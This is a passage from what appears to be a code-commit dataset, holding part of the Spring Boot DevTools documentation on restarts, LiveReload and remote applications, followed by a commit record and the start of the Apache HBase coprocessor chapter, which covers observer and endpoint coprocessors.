Gradle will trigger a restart. \n****\n\nNOTE: As long as forking is enabled, you can also start your application by using the supported build plugins (Maven and Gradle), since DevTools needs an isolated application classloader to operate properly.\nBy default, the Gradle and Maven plugins fork the application process.\n\nTIP: Automatic restart works very well when used with LiveReload.\n<<using-boot-devtools-livereload,See the LiveReload section>> for details.\nIf you use JRebel, automatic restarts are disabled in favor of dynamic class reloading.\nOther devtools features (such as LiveReload and property overrides) can still be used.\n\nNOTE: DevTools relies on the application context's shutdown hook to close it during a restart.\nIt does not work correctly if you have disabled the shutdown hook (`SpringApplication.setRegisterShutdownHook(false)`).\n\nNOTE: When deciding if an entry on the classpath should trigger a restart when it changes, DevTools automatically ignores projects named `spring-boot`, `spring-boot-devtools`, `spring-boot-autoconfigure`, `spring-boot-actuator`, and `spring-boot-starter`.\n\nNOTE: DevTools needs to customize the `ResourceLoader` used by the `ApplicationContext`.\nIf your application provides one already, it is going to be wrapped.\nDirect override of the `getResource` method on the `ApplicationContext` is not supported.\n\n[[using-spring-boot-restart-vs-reload]]\n.Restart vs Reload\n****\nThe restart technology provided by Spring Boot works by using two classloaders.\nClasses that do not change (for example, those from third-party jars) are loaded into a _base_ classloader.\nClasses that you are actively developing are loaded into a _restart_ classloader.\nWhen the application is restarted, the _restart_ classloader is thrown away and a new one is created.\nThis approach means that application restarts are typically much faster than \"`cold starts`\", since the _base_ classloader is already available and populated.\n\nIf you find that restarts are not quick enough for your applications or you encounter classloading issues, you could consider reloading technologies such as https:\/\/jrebel.com\/software\/jrebel\/[JRebel] from ZeroTurnaround.\nThese work by rewriting classes as they are loaded to make them more amenable to reloading.\n****\n\n\n\n[[using-boot-devtools-restart-logging-condition-delta]]\n==== Logging changes in condition evaluation\nBy default, each time your application restarts, a report showing the condition evaluation delta is logged.\nThe report shows the changes to your application's auto-configuration as you make changes such as adding or removing beans and setting configuration properties.\n\nTo disable the logging of the report, set the following property:\n\n[indent=0]\n----\n\tspring.devtools.restart.log-condition-evaluation-delta=false\n----\n\n\n[[using-boot-devtools-restart-exclude]]\n==== Excluding Resources\nCertain resources do not necessarily need to trigger a restart when they are changed.\nFor example, Thymeleaf templates can be edited in-place.\nBy default, changing resources in `\/META-INF\/maven`, `\/META-INF\/resources`, `\/resources`, `\/static`, `\/public`, or `\/templates` does not trigger a restart but does trigger a <<using-boot-devtools-livereload, live reload>>.\nIf you want to customize these exclusions, you can use the configprop:spring.devtools.restart.exclude[] property.\nFor example, to exclude only `\/static` and `\/public` you would set the following 
property:\n\n[indent=0]\n----\n\tspring.devtools.restart.exclude=static\/**,public\/**\n----\n\nTIP: If you want to keep those defaults and _add_ additional exclusions, use the configprop:spring.devtools.restart.additional-exclude[] property instead.\n\n\n\n[[using-boot-devtools-restart-additional-paths]]\n==== Watching Additional Paths\nYou may want your application to be restarted or reloaded when you make changes to files that are not on the classpath.\nTo do so, use the configprop:spring.devtools.restart.additional-paths[] property to configure additional paths to watch for changes.\nYou can use the configprop:spring.devtools.restart.exclude[] property <<using-boot-devtools-restart-exclude, described earlier>> to control whether changes beneath the additional paths trigger a full restart or a <<using-boot-devtools-livereload, live reload>>.\n\n\n\n[[using-boot-devtools-restart-disable]]\n==== Disabling Restart\nIf you do not want to use the restart feature, you can disable it by using the configprop:spring.devtools.restart.enabled[] property.\nIn most cases, you can set this property in your `application.properties` (doing so still initializes the restart classloader, but it does not watch for file changes).\n\nIf you need to _completely_ disable restart support (for example, because it does not work with a specific library), you need to set the configprop:spring.devtools.restart.enabled[] `System` property to `false` before calling `SpringApplication.run(...)`, as shown in the following example:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSystem.setProperty(\"spring.devtools.restart.enabled\", \"false\");\n\t\tSpringApplication.run(MyApp.class, args);\n\t}\n----\n\n\n\n[[using-boot-devtools-restart-triggerfile]]\n==== Using a Trigger File\nIf you work with an IDE that continuously compiles changed files, you might prefer to trigger restarts only at specific times.\nTo do so, you can use a \"`trigger file`\", which is a special file that must be modified when you want to actually trigger a restart check.\n\nNOTE: Any update to the file will trigger a check, but restart only actually occurs if Devtools has detected it has something to do.\n\nTo use a trigger file, set the configprop:spring.devtools.restart.trigger-file[] property to the name (excluding any path) of your trigger file.\nThe trigger file must appear somewhere on your classpath.\n\nFor example, if you have a project with the following structure:\n\n[indent=0]\n----\n\tsrc\n\t+- main\n\t +- resources\n\t +- .reloadtrigger\n----\n\nThen your `trigger-file` property would be:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.trigger-file=.reloadtrigger\n----\n\nRestarts will now only happen when the `src\/main\/resources\/.reloadtrigger` is updated.\n\nTIP: You might want to set `spring.devtools.restart.trigger-file` as a <<using-boot-devtools-globalsettings,global setting>>, so that all your projects behave in the same way.\n\nSome IDEs have features that save you from needing to update your trigger file manually.\nhttps:\/\/spring.io\/tools[Spring Tools for Eclipse] and https:\/\/www.jetbrains.com\/idea\/[IntelliJ IDEA (Ultimate Edition)] both have such support.\nWith Spring Tools, you can use the \"`reload`\" button from the console view (as long as your `trigger-file` is named `.reloadtrigger`).\nFor IntelliJ IDEA, you can follow the https:\/\/www.jetbrains.com\/help\/idea\/spring-boot.html#application-update-policies[instructions in their 
documentation].\n\n\n\n[[using-boot-devtools-customizing-classload]]\n==== Customizing the Restart Classloader\nAs described earlier in the <<using-spring-boot-restart-vs-reload>> section, restart functionality is implemented by using two classloaders.\nFor most applications, this approach works well.\nHowever, it can sometimes cause classloading issues.\n\nBy default, any open project in your IDE is loaded with the \"`restart`\" classloader, and any regular `.jar` file is loaded with the \"`base`\" classloader.\nIf you work on a multi-module project, and not every module is imported into your IDE, you may need to customize things.\nTo do so, you can create a `META-INF\/spring-devtools.properties` file.\n\nThe `spring-devtools.properties` file can contain properties prefixed with `restart.exclude` and `restart.include`.\nThe `include` elements are items that should be pulled up into the \"`restart`\" classloader, and the `exclude` elements are items that should be pushed down into the \"`base`\" classloader.\nThe value of the property is a regex pattern that is applied to the classpath, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\trestart.exclude.companycommonlibs=\/mycorp-common-[\\\\w\\\\d-\\.]+\\.jar\n\trestart.include.projectcommon=\/mycorp-myproj-[\\\\w\\\\d-\\.]+\\.jar\n----\n\nNOTE: All property keys must be unique.\nAs long as a property starts with `restart.include.` or `restart.exclude.`, it is considered.\n\nTIP: All `META-INF\/spring-devtools.properties` from the classpath are loaded.\nYou can package files inside your project, or in the libraries that the project consumes.\n\n\n\n[[using-boot-devtools-known-restart-limitations]]\n==== Known Limitations\nRestart functionality does not work well with objects that are deserialized by using a standard `ObjectInputStream`.\nIf you need to deserialize data, you may need to use Spring's `ConfigurableObjectInputStream` in combination with `Thread.currentThread().getContextClassLoader()`.
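\nA minimal sketch (assuming `bytes` holds the serialized form and `MyData` is one of your own classes):\n\n[source,java,indent=0]\n----\n\timport java.io.ByteArrayInputStream;\n\n\timport org.springframework.core.ConfigurableObjectInputStream;\n\n\t\/\/ ...\n\ttry (ConfigurableObjectInputStream in = new ConfigurableObjectInputStream(\n\t\t\tnew ByteArrayInputStream(bytes), Thread.currentThread().getContextClassLoader())) {\n\t\t\/\/ the context (restart) classloader is used to resolve MyData\n\t\tMyData data = (MyData) in.readObject();\n\t}\n----\n\nUnfortunately, several third-party libraries deserialize without considering the context classloader.\nIf you find such a problem, you need to request a fix from the original authors.\n\n\n\n[[using-boot-devtools-livereload]]\n=== LiveReload\nThe `spring-boot-devtools` module includes an embedded LiveReload server that can be used to trigger a browser refresh when a resource is changed.\nLiveReload browser extensions are freely available for Chrome, Firefox and Safari from http:\/\/livereload.com\/extensions\/[livereload.com].\n\nIf you do not want to start the LiveReload server when your application runs, you can set the configprop:spring.devtools.livereload.enabled[] property to `false`.\n\nNOTE: You can only run one LiveReload server at a time.\nBefore starting your application, ensure that no other LiveReload servers are running.\nIf you start multiple applications from your IDE, only the first has LiveReload support.\n\nWARNING: To trigger LiveReload when a file changes, <<using-boot-devtools-restart>> must be enabled.\n\n\n\n[[using-boot-devtools-globalsettings]]\n=== Global Settings\nYou can configure global devtools settings by adding any of the following files to the `$HOME\/.config\/spring-boot` folder:\n\n. `spring-boot-devtools.properties`\n. `spring-boot-devtools.yaml`\n. 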
`spring-boot-devtools.yml`\n\nAny properties added to these files apply to _all_ Spring Boot applications on your machine that use devtools.\nFor example, to configure restart to always use a <<using-boot-devtools-restart-triggerfile, trigger file>>, you would add the following property:\n\n.~\/.config\/spring-boot\/spring-boot-devtools.properties\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.trigger-file=.reloadtrigger\n----\n\nNOTE: If devtools configuration files are not found in `$HOME\/.config\/spring-boot`, the root of the `$HOME` folder is searched for the presence of a `.spring-boot-devtools.properties` file.\nThis allows you to share the devtools global configuration with applications that are on an older version of Spring Boot that does not support the `$HOME\/.config\/spring-boot` location.\n\n[NOTE]\n====\nProfiles are not supported in devtools properties\/yaml files.\n\nAny profiles activated in `.spring-boot-devtools.properties` will not affect the loading of <<spring-boot-features.adoc#boot-features-external-config-profile-specific-properties, profile-specific configuration files>>.\nProfile-specific filenames (of the form `spring-boot-devtools-<profile>.properties`) and `spring.profile` sub-documents in YAML files are not supported.\n====\n\n\n\n[[configuring-file-system-watcher]]\n==== Configuring File System Watcher\n{spring-boot-devtools-module-code}\/filewatch\/FileSystemWatcher.java[FileSystemWatcher] works by polling for class changes at a certain time interval, and then waiting for a predefined quiet period to make sure there are no more changes.\nSince Spring Boot relies entirely on the IDE to compile and copy files into the location from where Spring Boot can read them, you might find that there are times when certain changes are not reflected when devtools restarts the application.\nIf you observe such problems constantly, try increasing the `spring.devtools.restart.poll-interval` and `spring.devtools.restart.quiet-period` parameters to the values that fit your development environment:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.poll-interval=2s\n\tspring.devtools.restart.quiet-period=1s\n----\n\nThe monitored classpath folders are now polled every 2 seconds for changes, and a 1 second quiet period is maintained to make sure there are no additional class changes.\n\n\n\n[[using-boot-devtools-remote]]\n=== Remote Applications\nThe Spring Boot developer tools are not limited to local development.\nYou can also use several features when running applications remotely.\nRemote support is opt-in, as enabling it can be a security risk.\nIt should only be enabled when running on a trusted network or when secured with SSL.\nIf neither of these options is available to you, you should not use DevTools' remote support.\nYou should never enable support on a production deployment.\n\nTo enable it, you need to make sure that `devtools` is included in the repackaged archive, as shown in the following listing:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<excludeDevtools>false<\/excludeDevtools>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nThen you need to set the configprop:spring.devtools.remote.secret[] property.\nLike any important password or secret, the value should 
be unique and strong such that it cannot be guessed or brute-forced.\n\nRemote devtools support is provided in two parts: a server-side endpoint that accepts connections and a client application that you run in your IDE.\nThe server component is automatically enabled when the configprop:spring.devtools.remote.secret[] property is set.\nThe client component must be launched manually.\n\n\n\n==== Running the Remote Client Application\nThe remote client application is designed to be run from within your IDE.\nYou need to run `org.springframework.boot.devtools.RemoteSpringApplication` with the same classpath as the remote project that you connect to.\nThe application's single required argument is the remote URL to which it connects.\n\nFor example, if you are using Eclipse or STS and you have a project named `my-app` that you have deployed to Cloud Foundry, you would do the following:\n\n* Select `Run Configurations...` from the `Run` menu.\n* Create a new `Java Application` \"`launch configuration`\".\n* Browse for the `my-app` project.\n* Use `org.springframework.boot.devtools.RemoteSpringApplication` as the main class.\n* Add `+++https:\/\/myapp.cfapps.io+++` to the `Program arguments` (or whatever your remote URL is).\n\nA running remote client might resemble the following listing:\n\n[indent=0,subs=\"attributes\"]\n----\n\t . ____ _ __ _ _\n\t \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ ___ _ \\ \\ \\ \\\n\t( ( )\\___ | '_ | '_| | '_ \\\/ _` | | _ \\___ _ __ ___| |_ ___ \\ \\ \\ \\\n\t \\\\\/ ___)| |_)| | | | | || (_| []::::::[] \/ -_) ' \\\/ _ \\ _\/ -_) ) ) ) )\n\t ' |____| .__|_| |_|_| |_\\__, | |_|_\\___|_|_|_\\___\/\\__\\___|\/ \/ \/ \/\n\t =========|_|==============|___\/===================================\/_\/_\/_\/\n\t :: Spring Boot Remote :: {spring-boot-version}\n\n\t2015-06-10 18:25:06.632 INFO 14938 --- [ main] o.s.b.devtools.RemoteSpringApplication : Starting RemoteSpringApplication on pwmbp with PID 14938 (\/Users\/pwebb\/projects\/spring-boot\/code\/spring-boot-project\/spring-boot-devtools\/target\/classes started by pwebb in \/Users\/pwebb\/projects\/spring-boot\/code)\n\t2015-06-10 18:25:06.671 INFO 14938 --- [ main] s.c.a.AnnotationConfigApplicationContext : Refreshing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a17b7b6: startup date [Wed Jun 10 18:25:06 PDT 2015]; root of context hierarchy\n\t2015-06-10 18:25:07.043 WARN 14938 --- [ main] o.s.b.d.r.c.RemoteClientConfiguration : The connection to http:\/\/localhost:8080 is insecure. 
You should use a URL starting with 'https:\/\/'.\n\t2015-06-10 18:25:07.074 INFO 14938 --- [ main] o.s.b.d.a.OptionalLiveReloadServer : LiveReload server is running on port 35729\n\t2015-06-10 18:25:07.130 INFO 14938 --- [ main] o.s.b.devtools.RemoteSpringApplication : Started RemoteSpringApplication in 0.74 seconds (JVM running for 1.105)\n----\n\nNOTE: Because the remote client is using the same classpath as the real application it can directly read application properties.\nThis is how the configprop:spring.devtools.remote.secret[] property is read and passed to the server for authentication.\n\nTIP: It is always advisable to use `https:\/\/` as the connection protocol, so that traffic is encrypted and passwords cannot be intercepted.\n\nTIP: If you need to use a proxy to access the remote application, configure the `spring.devtools.remote.proxy.host` and `spring.devtools.remote.proxy.port` properties.\n\n\n\n[[using-boot-devtools-remote-update]]\n==== Remote Update\nThe remote client monitors your application classpath for changes in the same way as the <<using-boot-devtools-restart,local restart>>.\nAny updated resource is pushed to the remote application and (_if required_) triggers a restart.\nThis can be helpful if you iterate on a feature that uses a cloud service that you do not have locally.\nGenerally, remote updates and restarts are much quicker than a full rebuild and deploy cycle.\n\nOn a slower development environment, it may happen that the quiet period is not enough, and the changes in the classes may be split into batches.\nThe server is restarted after the first batch of class changes is uploaded.\nThe next batch can\u2019t be sent to the application, since the server is restarting.\n\nThis is typically manifested by a warning in the `RemoteSpringApplication` logs about failing to upload some of the classes, and a consequent retry.\nBut it may also lead to application code inconsistency and failure to restart after the first batch of changes is uploaded.\nIf you observe such problems constantly, try increasing the `spring.devtools.restart.poll-interval` and `spring.devtools.restart.quiet-period` parameters to the values that fit your development environment.\nSee the <<configuring-file-system-watcher>> section for configuring these properties.\n\nNOTE: Files are only monitored when the remote client is running.\nIf you change a file before starting the remote client, it is not pushed to the remote server.\n\n\n\n[[using-boot-packaging-for-production]]\n== Packaging Your Application for Production\nExecutable jars can be used for production deployment.\nAs they are self-contained, they are also ideally suited for cloud-based deployment.\n\nFor additional \"`production ready`\" features, such as health, auditing, and metric REST or JMX end-points, consider adding `spring-boot-actuator`.\nSee _<<production-ready-features.adoc#production-ready>>_ for details.\n\n\n\n[[using-boot-whats-next]]\n== What to Read Next\nYou should now understand how you can use Spring Boot and some best practices that you should follow.\nYou can now go on to learn about specific _<<spring-boot-features#boot-features, Spring Boot features>>_ in depth, or you could skip ahead and read about the \"`<<production-ready-features#production-ready, production ready>>`\" aspects of Spring Boot.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1004e43a44a95fa76a1d7bb9e060b9dd581bf400","subject":"HBASE-26529 Document HBASE-26524 to section of Dynamic Unloading 
(#3909)","message":"HBASE-26529 Document HBASE-26524 to section of Dynamic Unloading (#3909)\n\nSigned-off-by: Wellington Chevreuil <288b11feb05c8ea384dc1375c6a84157a57eeb16@apache.org>\r\nSigned-off-by: Peter Somogyi <dfe29050aae9e16fc6784bf10581623b02587478@apache.org>","repos":"ndimiduk\/hbase,mahak\/hbase,ndimiduk\/hbase,mahak\/hbase,Apache9\/hbase,Apache9\/hbase,apurtell\/hbase,ndimiduk\/hbase,mahak\/hbase,Apache9\/hbase,Apache9\/hbase,mahak\/hbase,apurtell\/hbase,ndimiduk\/hbase,ndimiduk\/hbase,Apache9\/hbase,mahak\/hbase,mahak\/hbase,apurtell\/hbase,apurtell\/hbase,mahak\/hbase,mahak\/hbase,apurtell\/hbase,ndimiduk\/hbase,mahak\/hbase,mahak\/hbase,apurtell\/hbase,Apache9\/hbase,apurtell\/hbase,Apache9\/hbase,apurtell\/hbase,ndimiduk\/hbase,Apache9\/hbase,Apache9\/hbase,apurtell\/hbase,ndimiduk\/hbase,Apache9\/hbase,ndimiduk\/hbase,apurtell\/hbase,ndimiduk\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/cp.adoc","new_file":"src\/main\/asciidoc\/_chapters\/cp.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[cp]]\n= Apache HBase Coprocessors\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nHBase Coprocessors are modeled after Google BigTable's coprocessor implementation\n(http:\/\/research.google.com\/people\/jeff\/SOCC2010-keynote-slides.pdf pages 41-42.).\n\nThe coprocessor framework provides mechanisms for running your custom code directly on\nthe RegionServers managing your data. Efforts are ongoing to bridge gaps between HBase's\nimplementation and BigTable's architecture. For more information see\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4047[HBASE-4047].\n\nThe information in this chapter is primarily sourced and heavily reused from the following\nresources:\n\n. Mingjie Lai's blog post\nlink:https:\/\/blogs.apache.org\/hbase\/entry\/coprocessor_introduction[Coprocessor Introduction].\n. Gaurav Bhardwaj's blog post\nlink:http:\/\/www.3pillarglobal.com\/insights\/hbase-coprocessors[The How To Of HBase Coprocessors].\n\n[WARNING]\n.Use Coprocessors At Your Own Risk\n====\nCoprocessors are an advanced feature of HBase and are intended to be used by system\ndevelopers only. Because coprocessor code runs directly on the RegionServer and has\ndirect access to your data, they introduce the risk of data corruption, man-in-the-middle\nattacks, or other malicious data access. 
Currently, there is no mechanism to prevent\ndata corruption by coprocessors, though work is underway on\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4047[HBASE-4047].\n+\nIn addition, there is no resource isolation, so a well-intentioned but misbehaving\ncoprocessor can severely degrade cluster performance and stability.\n====\n\n== Coprocessor Overview\n\nIn HBase, you fetch data using a `Get` or `Scan`, whereas in an RDBMS you use a SQL\nquery. In order to fetch only the relevant data, you filter it using an HBase\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/filter\/Filter.html[Filter],\nwhereas in an RDBMS you use a `WHERE` predicate.\n\nAfter fetching the data, you perform computations on it. This paradigm works well\nfor \"small data\" with a few thousand rows and several columns. However, when you scale\nto billions of rows and millions of columns, moving large amounts of data across your\nnetwork will create bottlenecks at the network layer, and the client needs to be powerful\nenough and have enough memory to handle the large amounts of data and the computations.\nIn addition, the client code can grow large and complex.\n\nIn this scenario, coprocessors might make sense. You can put the business computation\ncode into a coprocessor which runs on the RegionServer, in the same location as the\ndata, and returns the result to the client.\n\nThis is only one scenario where using coprocessors can provide benefit. Following\nare some analogies which may help to explain some of the benefits of coprocessors.\n\n[[cp_analogies]]\n=== Coprocessor Analogies\n\nTriggers and Stored Procedures::\n An Observer coprocessor is similar to a trigger in an RDBMS in that it executes\n your code either before or after a specific event (such as a `Get` or `Put`)\n occurs. An endpoint coprocessor is similar to a stored procedure in an RDBMS\n because it allows you to perform custom computations on the data on the\n RegionServer itself, rather than on the client.\n\nMapReduce::\n MapReduce operates on the principle of moving the computation to the location of\n the data. Coprocessors operate on the same principle.\n\nAOP::\n If you are familiar with Aspect Oriented Programming (AOP), you can think of a coprocessor\n as applying advice by intercepting a request and then running some custom code,\n before passing the request on to its final destination (or even changing the destination).\n\n\n=== Coprocessor Implementation Overview\n\n. Your class should implement one of the Coprocessor interfaces -\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/Coprocessor.html[Coprocessor],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/CoprocessorService.html[CoprocessorService] - to name a few.\n\n. Load the coprocessor, either statically (from the configuration) or dynamically,\nusing HBase Shell. For more details see <<cp_loading,Loading Coprocessors>>.\n\n. Call the coprocessor from your client-side code. HBase handles the coprocessor\ntransparently.\n\nThe framework API is provided in the\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/package-summary.html[coprocessor]\npackage.\n
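\nFor orientation, the following is a minimal sketch of such a class using the HBase 2.x interfaces (the class name and the empty hook are illustrative; the <<cp_example,Examples>> section develops a complete version):\n\n[source,java]\n----\npublic class ExampleRegionObserver implements RegionCoprocessor, RegionObserver {\n\n    \/\/ Expose this class's observer callbacks to the framework.\n    @Override\n    public Optional<RegionObserver> getRegionObserver() {\n        return Optional.of(this);\n    }\n\n    \/\/ Runs before every Get on regions where the coprocessor is loaded.\n    @Override\n    public void preGetOp(ObserverContext<RegionCoprocessorEnvironment> c,\n        Get get, List<Cell> results) throws IOException {\n        \/\/ custom pre-read logic goes here\n    }\n}\n----\n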
\n== Types of Coprocessors\n\n=== Observer Coprocessors\n\nObserver coprocessors are triggered either before or after a specific event occurs.\nObservers that happen before an event use methods that start with a `pre` prefix,\nsuch as link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html#prePut-org.apache.hadoop.hbase.coprocessor.ObserverContext-org.apache.hadoop.hbase.client.Put-org.apache.hadoop.hbase.wal.WALEdit-org.apache.hadoop.hbase.client.Durability-[`prePut`]. Observers that happen just after an event override methods that start\nwith a `post` prefix, such as link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html#postPut-org.apache.hadoop.hbase.coprocessor.ObserverContext-org.apache.hadoop.hbase.client.Put-org.apache.hadoop.hbase.wal.WALEdit-org.apache.hadoop.hbase.client.Durability-[`postPut`].\n\n\n==== Use Cases for Observer Coprocessors\nSecurity::\n Before performing a `Get` or `Put` operation, you can check for permission using\n `preGet` or `prePut` methods. A sketch of this pattern is given at the end of this section.\n\nReferential Integrity::\n HBase does not directly support the RDBMS concept of referential integrity, also known\n as foreign keys. You can use a coprocessor to enforce such integrity. For instance,\n if you have a business rule that every insert to the `users` table must be followed\n by a corresponding entry in the `user_daily_attendance` table, you could implement\n a coprocessor to use the `prePut` method on `users` to insert a record into `user_daily_attendance`.\n\nSecondary Indexes::\n You can use a coprocessor to maintain secondary indexes. For more information, see\n link:https:\/\/cwiki.apache.org\/confluence\/display\/HADOOP2\/Hbase+SecondaryIndexing[SecondaryIndexing].\n\n\n==== Types of Observer Coprocessors\n\nRegionObserver::\n A RegionObserver coprocessor allows you to observe events on a region, such as `Get`\n and `Put` operations. See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver].\n\nRegionServerObserver::\n A RegionServerObserver allows you to observe events related to the RegionServer's\n operation, such as starting, stopping, or performing merges, commits, or rollbacks.\n See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionServerObserver.html[RegionServerObserver].\n\nMasterObserver::\n A MasterObserver allows you to observe events related to the HBase Master, such\n as table creation, deletion, or schema modification. See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/MasterObserver.html[MasterObserver].\n\nWalObserver::\n A WalObserver allows you to observe events related to writes to the Write-Ahead\n Log (WAL). See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/WALObserver.html[WALObserver].\n\n<<cp_example,Examples>> provides working examples of observer coprocessors.\n
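\nAs a taste of the Security use case above, a `prePut` hook that rejects writes to a protected row might look like the following (a hedged sketch, not code from the HBase examples: the row key, the error message, and the choice of `AccessDeniedException` from `org.apache.hadoop.hbase.security` are all illustrative):\n\n[source,java]\n----\n@Override\npublic void prePut(ObserverContext<RegionCoprocessorEnvironment> c,\n    Put put, WALEdit edit, Durability durability) throws IOException {\n    if (Bytes.equals(put.getRow(), Bytes.toBytes(\"admin\"))) {\n        throw new AccessDeniedException(\"Writes to the admin row are not allowed\");\n    }\n}\n----\n\nThrowing an `IOException` from a `pre` hook fails the client operation before any data is written.\n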
\n\n[[cpeps]]\n=== Endpoint Coprocessor\n\nEndpoint coprocessors allow you to perform computation at the location of the data.\nSee <<cp_analogies, Coprocessor Analogies>>. An example is the need to calculate a running\naverage or summation for an entire table which spans hundreds of regions.\n\nIn contrast to observer coprocessors, where your code is run transparently, endpoint\ncoprocessors must be explicitly invoked using the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/AsyncTable.html#coprocessorService-java.util.function.Function-org.apache.hadoop.hbase.client.ServiceCaller-byte:A-[CoprocessorService()]\nmethod available in\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/AsyncTable.html[AsyncTable].\n\n[WARNING]\n.On using coprocessorService method with sync client\n====\nThe coprocessorService method in link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table]\nhas been deprecated.\n\nIn link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-21512[HBASE-21512]\nwe reimplemented the sync client based on the async client. The coprocessorService\nmethod defined in the `Table` interface directly references a method from protobuf's\n`BlockingInterface`, which means we would need to use a separate thread pool to execute\nthe method in order to avoid blocking the async client (we want to avoid blocking calls in\nour async implementation).\n\nSince coprocessors are an advanced feature, we believe it is OK for coprocessor users to\nswitch over to `AsyncTable` instead. There is a lightweight\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/Connection.html#toAsyncConnection--[toAsyncConnection]\nmethod to get an `AsyncConnection` from `Connection` if needed.\n====\n\nStarting with HBase 0.96, endpoint coprocessors are implemented using Google Protocol\nBuffers (protobuf). For more details on protobuf, see Google's\nlink:https:\/\/developers.google.com\/protocol-buffers\/docs\/proto[Protocol Buffer Guide].\nEndpoint Coprocessors written for version 0.94 are not compatible with version 0.96 or later\n(see link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-5448[HBASE-5448]). To upgrade your\nHBase cluster from 0.94 or earlier to 0.96 or later, you need to reimplement your\ncoprocessor.\n\nIn HBase 2.x, we made use of a shaded version of protobuf 3.x, but kept the\nprotobuf for coprocessors on 2.5.0. In HBase 3.0.0, we removed all dependencies on\nnon-shaded protobuf, so you need to reimplement your coprocessor to make use of the\nshaded protobuf version provided in hbase-thirdparty. Please see\nthe <<protobuf,protobuf>> section for more details.\n\nCoprocessor Endpoints should make no use of HBase internals and should\nonly use public APIs; ideally a CPEP should depend on interfaces\nand data structures only. This is not always possible, but beware\nthat depending on internals makes the Endpoint brittle, liable to breakage as HBase\ninternals evolve. HBase internal APIs annotated as private or evolving\ndo not have to respect semantic versioning rules or general Java rules on\ndeprecation before removal. While generated protobuf files lack the HBase audience\nannotations -- they are created by the protobuf protoc tool, which knows nothing of\nhow HBase works -- they should be considered `@InterfaceAudience.Private` and so are\nliable to change.\n
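\nIn practice, the protobuf migration described above mostly shows up in your imports. The following sketch contrasts the two (it assumes the usual hbase-thirdparty relocation prefix; verify the package names against the hbase-thirdparty version you build with):\n\n[source,java]\n----\n\/\/ On HBase 2.x, a CPEP imports plain protobuf 2.5 classes, for example:\n\/\/   import com.google.protobuf.RpcCallback;\n\/\/ On HBase 3.0+, the same types come from the shaded hbase-thirdparty packages:\nimport org.apache.hbase.thirdparty.com.google.protobuf.RpcCallback;\nimport org.apache.hbase.thirdparty.com.google.protobuf.RpcController;\nimport org.apache.hbase.thirdparty.com.google.protobuf.Service;\n----\n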
